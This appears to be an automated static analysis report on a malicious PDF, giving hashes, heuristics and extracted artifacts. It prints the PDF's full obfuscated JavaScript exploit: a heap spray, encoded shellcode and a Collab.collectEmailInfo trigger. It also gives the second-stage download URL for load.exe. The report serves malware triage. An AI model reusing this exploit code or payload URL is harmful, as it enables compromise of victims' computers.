Malicious PDF — malware analysis report

Static analysis result for SHA-256 f6eaab4b8887141b…

MALICIOUS

PDF

2.8 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-03-04
MD5: 3a82969ee09a0417346225d087521118 SHA-1: 74fa0ebf76a3c09c751c695cfcb0c31f9fd11f28 SHA-256: f6eaab4b8887141b46bc0831b20ed4d969c0a0283b78a9c5a83f70263592f282
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded and obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_UNESCAPE. The script, identified as javascript_obj0013_001.js, likely attempts to download and execute a second-stage payload. The presence of the unescape() function suggests an attempt to deobfuscate malicious code. Due to the obfuscation, the exact payload and delivery mechanism cannot be fully determined.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var gtJaJ4DZp = 0x0c0c0c0c;
       var vsM15 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941% …
       var ntMEmfp6j4fZg = 0x400000;
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://buterik.com/123/load.exe Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 2916 bytes
SHA-256: 91143bc2adf582cec760b0b6b52cfcbb4c2ec82bf325ca21351ff95ba66f4aa5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function ezet093EavXm() {	var rRq3mFFJNApj = new Array(); 
		function ZpE72z7gsFou(Vp2BPjdGm, O3iuCYd3LT) { 
			while (Vp2BPjdGm.length*2<O3iuCYd3LT){Vp2BPjdGm += Vp2BPjdGm;} 
			Vp2BPjdGm = Vp2BPjdGm.substring(0,O3iuCYd3LT/2);
			return Vp2BPjdGm; 
		}

		function PVGYB0n14() { 
			var gtJaJ4DZp = 0x0c0c0c0c; 
			var vsM15 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u622F%u7475%u7265%u6B69%u632E%u6D6F%u312F%u3332%u6C2F%u616F%u2E64%u7865%u0065");
			var ntMEmfp6j4fZg = 0x400000;
			var C3lWxPeDW = vsM15.length * 2;
			var O3iuCYd3LT = ntMEmfp6j4fZg - (C3lWxPeDW+0x38);
			var Vp2BPjdGm = unescape("%u9090%u9090");
			Vp2BPjdGm = ZpE72z7gsFou(Vp2BPjdGm, O3iuCYd3LT);
			var RAjByYFnRb3EHr = (gtJaJ4DZp - 0x400000)/ntMEmfp6j4fZg;
			
			for (var D8G8PidgGop=0;D8G8PidgGop<RAjByYFnRb3EHr;D8G8PidgGop++) { 
				rRq3mFFJNApj[D8G8PidgGop] = Vp2BPjdGm + vsM15;
			}
		}

		function nuzab() {
			var wdWYb = app.viewerVersion.toString();
			wdWYb = wdWYb.replace(/\D/g,"");
			var woSFkcy = new Array(wdWYb.charAt(0),wdWYb.charAt(1),wdWYb.charAt(2));
			var h5kUtDk = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((woSFkcy[0] == 8 &&
			((woSFkcy[1] == 1 && woSFkcy[2] < 2) || woSFkcy[1] < 1)) || 
			(woSFkcy[0] == 7 && woSFkcy[1] < 1) || 
			(woSFkcy[0] < 7)) {
			        var qXhpIjT = Collab;
				PVGYB0n14();
				var FXCPzoRD6JY = unescape("%u0c0c%u0c0c");
				var BiaSGmrFaJTgc = "c24ol2la572bS8to2445r5e00";
				while(FXCPzoRD6JY.length < 44952) FXCPzoRD6JY += FXCPzoRD6JY;
				this[BiaSGmrFaJTgc.replace(new RegExp(/\d/g),"")] = qXhpIjT[h5kUtDk.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              FXCPzoRD6JY});
			} 
		}
		nuzab();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A 444 bytes
SHA-256: bcb2470f54ff4d180f2f1d8ee994554fbbb7541e67bae743de98e7713ac34a25